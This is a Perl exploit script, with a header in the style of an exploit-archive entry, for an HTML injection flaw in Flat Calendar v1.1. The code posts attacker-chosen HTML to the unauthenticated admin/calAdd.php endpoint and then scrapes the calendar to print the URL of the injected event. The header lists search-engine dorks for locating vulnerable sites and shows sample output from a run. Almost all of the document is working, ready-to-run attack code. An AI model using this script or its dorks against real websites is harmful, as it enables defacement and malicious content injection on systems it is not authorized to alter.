1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130 | #!/usr/bin/perl -w
#Title : Flat Calendar v1.1 HTML Injection Exploit
#Download : http://www.circulargenius.com/flatcalendar/FlatCalendar-v1.1.zip
#Author : ZoRLu / zorlu@milw00rm.com
#Website : http://milw00rm.com / its online
#Twitter : https://twitter.com/milw00rm or @milw00rm
#Test : Windows7 Ultimate
#Date : 08/12/2014
#Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
#BkiAdam : Dr.Ly0n, KnocKout, LifeSteaLeR, Nicx (harf sirali :)) )
#Dork1 : intext:"Flat Calendar is powered by Flat File DB"
#Dork2 : inurl:"viewEvent.php?eventNumber="
#
#C:\Users\admin\Desktop>perl flat.pl
#
#Usage: perl flat.pl http://server /calender_path/ indexfile nickname
#Exam1: perl flat.pl http://server / index.html ZoRLu
#Exam2: perl flat.pl http://server /calendar/ index.html ZoRLu
#
#C:\Users\admin\Desktop>perl flat.pl http://server /member_content/diaries/womens/calendar/ index.html ZoRLu
#
#[+] Target: http://server
#[+] Path: /member_content/diaries/womens/calendar/
#[+] index: index.html
#[+] Nick: ZoRLu
#[+] Exploit Succes
#[+] Searching url...
#[+] YourEventNumber = 709
#[+] http://server/member_content/diaries/womens/calendar/viewEvent.php?eventNumber=709
use HTTP::Request::Common qw( POST );
use LWP::UserAgent;
use IO::Socket;
use strict;
use warnings;
sub hlp() {
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print "\nUsage: perl $0 http://server /calender_path/ indexfile nickname\n";
print "Exam1: perl $0 http://server / index.html ZoRLu\n";
print "Exam2: perl $0 http://server /calendar/ index.html ZoRLu\n";
}
if(@ARGV != 4) {
hlp();
exit();
}
my $ua = LWP::UserAgent->new;
my $url = $ARGV[0];
my $path = $ARGV[1];
my $index = $ARGV[2];
my $nick = $ARGV[3];
my $vuln = $url . $path . "admin/calAdd.php";
print "\n[+] Target: ".$url."\n";
print "[+] Path: ".$path."\n";
print "[+] index: ".$index."\n";
print "[+] Nick: ".$nick."\n";
my @months = qw(January February March April May June July August September October November December);
my ($day, $month, $yearset) = (localtime)[3,4,5];
my $year = 1900 + $yearset;
my $moon = $months[$month];
if (open(my $fh, $index)) {
while (my $row = <$fh>) {
chomp $row;
my $req = POST $vuln, [
event => 'Test Page',
description => $row,
month => $moon,
day => $day,
year => $year,
submitted => $nick,
];
my $resp = $ua->request($req);
if ($resp->is_success) {
my $message = $resp->decoded_content;
my $regex = "Record Added: taking you back";
if ($message =~ /$regex/) {
print "[+] Exploit Succes\n";
my $newua = LWP::UserAgent->new( );
my $newurl = $url . $path . "calendar.php";
my $newreq = $newua->get($newurl);
if ($newreq->is_success) {
my $newmessage = $newreq->decoded_content;
my $first = rindex($newmessage,"viewEvent.php?eventNumber=");
print "[+] Searching url...\n";
my $request = substr($newmessage, $first+26, 4);
print "[+] YourEventNumber = $request\n";
sleep(1);
print "[+] ".$url.$path."viewEvent.php?eventNumber=".$request."\n";
}
else {
print "[-] HTTP POST error code: ", $newreq->code, "\n";
print "[-] HTTP POST error message: ", $newreq->message, "\n";
}
}
else {
print "[-] Exploit Failed";
}
}
else {
print "[-] HTTP POST error code: ", $resp->code, "\n";
print "[-] HTTP POST error message: ", $resp->message, "\n";
}
}
}
else {
sleep(1);
die ("[-] NotFound: $index\n");
}
|